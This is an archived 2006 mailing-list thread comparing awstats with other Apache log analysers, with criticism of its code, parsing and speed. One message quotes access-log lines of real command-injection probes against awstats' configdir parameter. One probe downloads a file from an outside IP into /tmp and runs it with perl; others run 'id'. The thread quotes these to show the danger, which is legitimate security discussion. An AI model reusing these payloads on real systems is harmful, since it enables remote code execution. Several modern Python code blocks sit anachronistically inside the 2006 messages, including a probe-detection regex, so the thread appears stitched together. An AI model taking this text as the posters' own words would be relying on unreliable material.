
Thread: awstats




awstats
user name
2006-03-08 08:45:26
A 10K-line CGI script, with most variables global and including its own CGI
parameter parsing. Is this really the best option, or can anyone suggest an
alternative which can parse Apache logfiles and successfully separate out
robots and spiders (about 80-90% of our hits) from real users? (The
department whose server this is rejected webalizer because they didn't like
the answers it gave).

Jonathan
awstats
user name
2006-03-08 08:51:24
We use analog here (http://www.analog.cx/), and it seems to be up to the job.
With something called Report Magic you can get some very nice stats out
of the box.

Personally I prefer something called webstats.pl, but I can't seem to
find a link to it anymore.

awstats
user name
2006-03-08 09:03:52
On Wed, Mar 08, 2006 at 08:51:24AM +0000, Peter Hickman wrote:
> We use analog here (http://www.analog.cx/), seems to be up to the job.
> With something called report magic you can get some very nice stats out
> of the box.

Isn't mint what all The Kewl Kids use these days?

http://www.haveamint.com/

I haven't, but then I amn't cool. awstats works for me, has done for
years. I never liked analog.

m.
-- 
 _________________________________________ 
/ Sharon: I was like, totally shocked     \
| when I read swm's postings on the list. |
| I thought he was a quiet boy. Everyone  |
\ else: *raucous laughter*                /
 ----------------------------------------- 
  \
   \
       __     
      UooU\.'`.
      \__/()
           ()
           `YY~~~~YY'
            ||    ||
--
Gotta have a blog. It is the law.
http://www.stray-toaster.co.uk/blog/
awstats
user name
2006-03-08 09:25:37
On 08/03/06, Jonathan McKeown <jonathanhst.org.za> wrote:
> A 10K-line CGI script, with most variables global and including its own CGI
> parameter parsing. Is this really the best option, or can anyone suggest an
> alternative which can parse Apache logfiles and successfully separate out
> robots and spiders (about 80-90% of our hits) from real users? (The
> department whose server this is rejected webalizer because they didn't like
> the answers it gave).

I run it as a cronjob generating a load of static HTML every night. It
works fine, and there's no dodgy CGI to worry about.
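For anyone wanting to copy the cron approach, here is a minimal Python sketch of a nightly job that first updates the AWStats database and then writes a static HTML report, so awstats.pl never has to be exposed as a CGI. The install path, output directory and config name are hypothetical; the `-config`, `-update`, `-output` and `-staticlinks` switches are awstats.pl command-line options, but check them against the documentation for your AWStats version.

```python
import subprocess
import sys
from pathlib import Path

# Hypothetical locations: adjust to wherever awstats.pl and the report should live.
AWSTATS = "/usr/local/awstats/wwwroot/cgi-bin/awstats.pl"
OUTPUT_DIR = Path("/var/www/stats")


def build_commands(config: str) -> list[list[str]]:
    """Return the awstats.pl invocations for one site config: first update
    the statistics database, then render the report with static links."""
    update = ["perl", AWSTATS, f"-config={config}", "-update"]
    render = ["perl", AWSTATS, f"-config={config}", "-output", "-staticlinks"]
    return [update, render]


def run_nightly(config: str) -> None:
    update, render = build_commands(config)
    subprocess.run(update, check=True)
    OUTPUT_DIR.mkdir(parents=True, exist_ok=True)
    # -output prints the HTML report on stdout, so capture it into a static file.
    with (OUTPUT_DIR / f"awstats.{config}.html").open("w") as out:
        subprocess.run(render, check=True, stdout=out)


if __name__ == "__main__" and len(sys.argv) > 1:
    run_nightly(sys.argv[1])
```

It would then be driven by a crontab line along the lines of `30 4 * * * /usr/bin/python3 /usr/local/bin/awstats_nightly.py mysite`, where the script name and schedule are again only placeholders.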

A.

awstats
user name
2006-03-08 09:27:10
On Wed, 2006-03-08 at 08:45, Jonathan McKeown wrote:
> A 10K-line CGI script, with most variables global and including its own CGI
> parameter parsing.

I'd say it has a widely known and exploitable flaw:

access.log:64.49.219.174 - - [08/Mar/2005:15:51:21 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://64.51.188.10/images/sess_3539283e27d73cae29fe2b80f9293f57;perl%20sess_3539283e27d73cae29fe2b80f9293f57;pwd;echo%20;echo| HTTP/1.1" 404 313
access.log:64.49.219.174 - - [08/Mar/2005:15:51:22 +0000] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://64.51.188.10/images/sess_3539283e27d73cae29fe2b80f9293f57;perl%20sess_3539283e27d73cae29fe2b80f9293f57;pwd;echo%20;echo| HTTP/1.1" 404 313
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 322
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000] "GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 314
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000] "GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 310
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000] "GET //cp/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 317
access.log:66.154.95.160 - - [15/Mar/2005:15:50:43 +0000] "GET //stat-cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 315
access.log:66.154.95.160 - - [15/Mar/2005:15:50:43 +0000] "GET //awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 314

It's still going on.
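The probes above all share one shape: a request for awstats.pl whose configdir parameter starts with a shell pipe character. A minimal Python sketch for spotting them in your own access logs is below. The regular expression is an assumption tuned to the lines quoted here, not a complete intrusion signature, and it expects raw log lines (without the "access.log:" prefix that grep adds).

```python
import re
from urllib.parse import unquote

# A GET for awstats.pl whose configdir value begins with a shell pipe,
# as in the probes quoted above. Assumed pattern, not an exhaustive signature.
PROBE = re.compile(r'"GET (\S*awstats\.pl\?configdir=\|[^"]*) HTTP/[\d.]+"')


def find_probes(lines):
    """Yield (client_ip, decoded_request_path) for each probe in `lines`."""
    for line in lines:
        match = PROBE.search(line)
        if match:
            client_ip = line.split(" ", 1)[0]  # first field of a raw log line
            yield client_ip, unquote(match.group(1))
```

Feeding it `open("access.log")` lists which clients tried the trick and what command they tried to run, with %20 and friends decoded.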

/J\
-- 

This e-mail is sponsored by http://www.integration-house.com/

awstats
user name
2006-03-08 09:47:11
I knew I had seen that somewhere before: my Snort logs!

There were only 20 incidents yesterday.

awstats
user name
2006-03-08 10:38:47
Jonathan McKeown wrote:
> A 10K-line CGI script, with most variables global and including its own CGI
> parameter parsing. Is this really the best option, or can anyone suggest an
> alternative which can parse Apache logfiles and successfully separate out
> robots and spiders (about 80-90% of our hits) from real users? (The
> department whose server this is rejected webalizer because they didn't like
> the answers it gave).

I'm kinda fond of

http://www.hping.org/visitors/

which admittedly isn't quite as featureful as most, but is simple, fast, and
seems to generate all the stats clients really *need* - plus a pretty
route-through-site diagram that fulfils the shininess quota nicely.

-- 
      Matt S Trout       Offering custom development, consultancy and support
   Technical Director    contracts for Catalyst, DBIx::Class and BAST. Contact
Shadowcat Systems Ltd.  mst (at) shadowcatsystems.co.uk for more information

+ Help us build a better perl ORM: http://dbix-class.shadowcatsystems.co.uk/ +
awstats
user name
2006-03-08 10:49:39
Jonathan McKeown writes:
> A 10K-line CGI script, with most variables global and including its own
> CGI parameter parsing.

We looked at Awstats, to the extent of actually running it for a while.
Then we stopped; we'd found plenty of reasons to avoid it:

  - The known vulnerabilities in its CGI mode may have been fixed, but
    spaghetti code like that is just too hard and/or unpleasant to
    audit.  I can't even say with confidence that letting Awstats parse
    your log files off-line is definitely safe.

  - It can't actually parse Apache logs.  Since 1.3.25, Apache has used
    a backslash escaping scheme for things like user-agents and
    referrers, so that you can actually parse log lines where the client
    sent a double-quote in one of those.  Awstats doesn't care about
    that, so it misparses those lines.

  - You can't just point it at a batch of log files; instead, you have
    to configure it to know where you store your log files, and the
    pattern used for the filenames.  That means you can't prime it with
    the last month's (or year's) worth of logs -- you just have to run
    it for a month before it can give you any real history.

  - It really really wants each vhost analysed to have exactly one log
    file.  In each time period, we have one log file per public-facing
    server, each containing results for several vhosts.  It wants us to
    split log files up by vhost, but then merge them by public-facing
    server, before we even have it look at them.

  - It doesn't seem particularly fast. Admittedly, we generate about
    4 GiB of uncompressed logs in a day, but our home-grown stuff (which
    does actually parse, you know, Apache log files) seems rather faster
    at the basic work of parsing logs, throwing away robotic traffic,
    and aggregating data from the rest.

    It's possible it's not as bad for other people.  In particular, to
    handle the vhost/server issue, we were effectively making Awstats
    run through our logs once per vhost.  But I became convinced that
    the time complexity of Awstats is supra-linear in the number of
    requests anyway.  As it gathered more data over the course of a
    month, it became apparent that it was soon going to need more CPU
    time than we had available.  That's when we turned it off.

In general, Awstats seems to be a tool that's intended for relatively
small sites, hosted by low-end providers, with limited or no shell
access, and exactly one log file per customer.  If you don't fall into
that category, I don't think Awstats is going to be particularly
convenient.

> Is this really the best option, or can anyone suggest an alternative
> which can parse Apache logfiles and successfully separate out robots
> and spiders (about 80-90% of our hits) from real users?

We wrote our own, sad to say.  We use the ABCE robot list; I've looked
at CPANning our code, but most of it's the data file, and I think ABCE
own the copyright on the list.
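The robot-separation step of a home-grown analyser might look roughly like this. The format of the ABCE list isn't described in the thread, so the tiny substring list below is a hypothetical stand-in for it, and treating every client that fetched /robots.txt as a robot is an added heuristic, not something from the thread. Records are assumed to be dicts with `host`, `agent` and `path` keys, such as a log parser might produce.

```python
# Hypothetical stand-in for a maintained robot list such as the ABCE one.
ROBOT_PATTERNS = ("bot", "crawler", "spider", "slurp")


def split_traffic(records):
    """Split request records into (human_hits, robot_hits).

    A record counts as robotic if its user-agent contains a known pattern,
    or if the same client host requested /robots.txt at any point."""
    records = list(records)  # two passes are needed, so materialise the input
    robot_hosts = {r["host"] for r in records if r["path"] == "/robots.txt"}
    humans, robots = [], []
    for r in records:
        agent = r["agent"].lower()
        if r["host"] in robot_hosts or any(p in agent for p in ROBOT_PATTERNS):
            robots.append(r)
        else:
            humans.append(r)
    return humans, robots
```

Substring matching is crude (it would also catch a human browser whose user-agent happens to contain "bot"), which is why a curated list is worth having.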

Note also that having home-grown log analysis stuff does mean that we
can do things that a general-purpose tool couldn't.  For example, our
software can examine popularity of site sections, rather than just of
URLs.
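Counting by site section rather than by URL mostly comes down to choosing the aggregation key. A minimal Python sketch, assuming a "section" is simply the first one or more path segments; a real site might need a hand-written URL-to-section map instead.

```python
from collections import Counter
from urllib.parse import urlsplit


def section_of(path: str, depth: int = 1) -> str:
    """Map a request path to its section: the first `depth` path segments."""
    segments = [s for s in urlsplit(path).path.split("/") if s]
    return "/" + "/".join(segments[:depth]) if segments else "/"


def section_popularity(paths, depth: int = 1) -> Counter:
    """Count hits per section instead of per individual URL."""
    return Counter(section_of(p, depth) for p in paths)
```

For example, `/news/2006/03/awstats.html`, `/news/index.html` and `/news?page=2` all count towards `/news`; raising `depth` to 2 would split that into `/news/2006` and so on.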

-- 
Aaron Crane
awstats
user name
2006-03-08 11:57:37
On Wed, 8 Mar 2006, Aaron Crane wrote:

> We looked at Awstats, to the extent of actually running it for a while.
> Then we stopped; we'd found plenty of reasons to avoid it:
>
>   - The known vulnerabilities in its CGI mode may have been fixed, but
>     spaghetti code like that is just too hard and/or unpleasant to
>     audit.  I can't even say with confidence that letting Awstats parse
>     your log files off-line is definitely safe.

Agreed. Every time I look at the code I want to scream. It's just crying
out to be refactored into decent modules.

>   - It can't actually parse Apache logs.  Since 1.3.25, Apache has used
>     a backslash escaping scheme for things like user-agents and
>     referrers, so that you can actually parse log lines where the client
>     sent a double-quote in one of those.  Awstats doesn't care about
>     that, so it misparses those lines.

I've not found this to be a problem with 6.4, but perhaps I'm not looking
in the right place. Which version did you try?

>   - You can't just point it at a batch of log files; instead, you have
>     to configure it to know where you store your log files, and the
>     pattern used for the filenames.  That means you can't prime it with
>     the last month's (or year's) worth of logs -- you just have to run
>     it for a month before it can give you any real history.

A simple shell script allows you to iterate over as many logs as you want.
We rotate logs weekly and have had to rerun a whole year's worth before now.
Wildcards would be nice, though.
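The backfill loop described here could look something like the following Python sketch, which also supplies the wildcard. It assumes awstats.pl accepts `-LogFile=` to override the LogFile setting from the config for a single run, which is an awstats.pl command-line option, but check it against your version's documentation. The install path is hypothetical, and ordering by modification time is an assumption that suits typically rotated logs, since AWStats generally expects records to arrive in chronological order.

```python
import glob
import os
import subprocess

AWSTATS = "/usr/local/awstats/wwwroot/cgi-bin/awstats.pl"  # hypothetical path


def update_command(config: str, logfile: str) -> list[str]:
    """One awstats.pl run that reads `logfile` instead of the config's LogFile."""
    return ["perl", AWSTATS, f"-config={config}", "-update", f"-LogFile={logfile}"]


def backfill(config: str, pattern: str, dry_run: bool = False) -> list[list[str]]:
    """Expand a wildcard and feed each matching log to AWStats, oldest first.

    Files are ordered by modification time, on the assumption that a rotated
    log was last written when it was rotated out."""
    logs = sorted(glob.glob(pattern), key=os.path.getmtime)
    commands = [update_command(config, path) for path in logs]
    if not dry_run:
        for cmd in commands:
            subprocess.run(cmd, check=True)
    return commands
```

Something like `backfill("mysite", "/var/log/apache/access.log.*", dry_run=True)` shows the planned runs before anything is touched.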

>   - It really really wants each vhost analysed to have exactly one log
>     file.  In each time period, we have one log file per public-facing
>     server, each containing results for several vhosts.  It wants us to
>     split log files up by vhost, but then merge them by public-facing
>     server, before we even have it look at them.

Kinda. You do need to merge the logs into timestamp order, but you can
look for specific vhosts with the %v modifier in the log format.
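Merging per-server logs into timestamp order is a k-way merge of already-sorted streams. AWStats ships a logresolvemerge.pl helper for this job; the sketch below is an independent Python illustration using `heapq.merge`, plus a vhost filter that assumes a LogFormat beginning with %v, so the virtual host is the first field of every line.

```python
import heapq
import re
from datetime import datetime

TIME = re.compile(r"\[([^\]]+)\]")


def timestamp(line: str) -> datetime:
    """Parse Apache's [dd/Mon/yyyy:HH:MM:SS +zzzz] timestamp from a log line."""
    return datetime.strptime(TIME.search(line).group(1), "%d/%b/%Y:%H:%M:%S %z")


def merge_logs(*streams):
    """Lazily merge several individually time-ordered log streams into one."""
    return heapq.merge(*streams, key=timestamp)


def for_vhost(lines, vhost: str):
    """Keep lines for one vhost; assumes the LogFormat starts with %v."""
    return (line for line in lines if line.split(" ", 1)[0] == vhost)
```

Because `heapq.merge` only holds one pending line per input, this works on open file objects without loading whole logs into memory.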

>   - It doesn't seem particularly fast. Admittedly, we generate about
>     4 GiB of uncompressed logs in a day, but our home-grown stuff (which
>     does actually parse, you know, Apache log files) seems rather faster
>     at the basic work of parsing logs, throwing away robotic traffic,
>     and aggregating data from the rest.

It's not very fast, and admits as much, but it's fast enough on our logs,
which are about 450 MB/week.

>     It's possible it's not as bad for other people.  In particular, to
>     handle the vhost/server issue, we were effectively making Awstats
>     run through our logs once per vhost.  But I became convinced that
>     the time complexity of Awstats is supra-linear in the number of
>     requests anyway.  As it gathered more data over the course of a
>     month, it became apparent that it was soon going to need more CPU
>     time than we had available.  That's when we turned it off.
>
> In general, Awstats seems to be a tool that's intended for relatively
> small sites, hosted by low-end providers, with limited or no shell
> access, and exactly one log file per customer.  If you don't fall into
> that category, I don't think Awstats is going to be particularly
> convenient.

I would agree with that. It's definitely not up to the job of managing
large sites.

> > Is this really the best option, or can anyone suggest an alternative
> > which can parse Apache logfiles and successfully separate out robots
> > and spiders (about 80-90% of our hits) from real users?
>
> We wrote our own, sad to say.  We use the ABCE robot list; I've looked
> at CPANning our code, but most of it's the data file, and I think ABCE
> own the copyright on the list.

We're tending towards doing this too. I just looked at WebTrends and it's
almost $10,000 for the licence we need.

> Note also that having home-grown log analysis stuff does mean that we
> can do things that a general-purpose tool couldn't.  For example, our
> software can examine popularity of site sections, rather than just of
> URLs.

This is the problem we're now experiencing with awstats. We need
granularity that awstats doesn't have.

Simon.

-- 
"You've really gotta know where your towel is."

awstats
user name
2006-03-08 14:36:57
Matt S Trout wrote:
> Jonathan McKeown wrote:
>> A 10K-line CGI script, with most variables global and including its own
>> CGI parameter parsing. Is this really the best option, or can anyone
>> suggest an alternative which can parse Apache logfiles and
>> successfully separate out robots and spiders (about 80-90% of our
>> hits) from real users? (The department whose server this is rejected
>> webalizer because they didn't like the answers it gave).
>
> I'm kinda fond of
>
> http://www.hping.org/visitors/
>
> which admittedly isn't quite as featureful as most, but is simple, fast,
> and seems to generate all the stats clients really *need* - plus a
> pretty route-through-site diagram that fulfils the shininess quota nicely.

mmm.... smooth.

Thanks for that. I now have a reason to ditch webalizer.

David
-- 
"It's overkill of course, but you can never have too much overkill."
